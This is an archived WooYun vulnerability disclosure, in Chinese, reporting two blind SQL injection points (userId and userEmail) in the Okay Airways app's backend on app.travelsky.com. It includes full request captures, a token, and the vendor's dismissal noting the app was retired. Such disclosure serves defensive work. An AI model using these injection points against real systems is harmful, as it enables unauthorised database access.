乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-23: 细节已通知厂商并且等待厂商处理中 2016-01-27: 厂商已经主动忽略漏洞,细节向公众公开
目标:奥凯航空官方APP检测发现以下地方存在SQL注入:一、POST中的userId,布尔盲注
POST https://app.travelsky.com/ad//webService/advert-activ/buyOrder.action HTTP/1.1param: 2f554f71c0a145vs9ag496ng3e2dfContent-Length: 56Content-Type: text/plain; charset=utf-8Host: app.travelsky.comConnection: Keep-AliveUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; X9180 Build/KVT49L) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1Cookie: Webtrends=113.118.98.249.1453524354727896Cookie2: $Version=1Accept-Encoding: gzip{"pageNo":"1","pageSize":"10","userId":"[email protected]"}
二、POST中的userEmail,时间盲注
POST https://app.travelsky.com/ad//webService/news/putUserKes.action HTTP/1.1param: 2f554f71c0a145vs9ag496ng3e2dfContent-Type: application/json;charset=utf-8token: 5B613257B72E3898141658BA5195EE9FContent-Length: 120Host: app.travelsky.comConnection: Keep-AliveUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; X9180 Build/KVT49L) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1Cookie: Webtrends=113.118.98.249.1453523602202277Cookie2: $Version=1Accept-Encoding: gzip{"conKey":"内容质量差","userEmail":"[email protected]","newsId":"20160123504582","uuid":"863890026674804","utype":"2"}
1、列出当前数据库用户
2、列出当前数据库
请多指教~
危害等级:无影响厂商忽略
忽略时间:2016-01-27 10:14
奥凯航空APP已于15年12月正式停止使用,漏洞所列数据库也非我公司所有。但还是非常感谢白帽子对我公司的反馈,谢谢支持!
暂无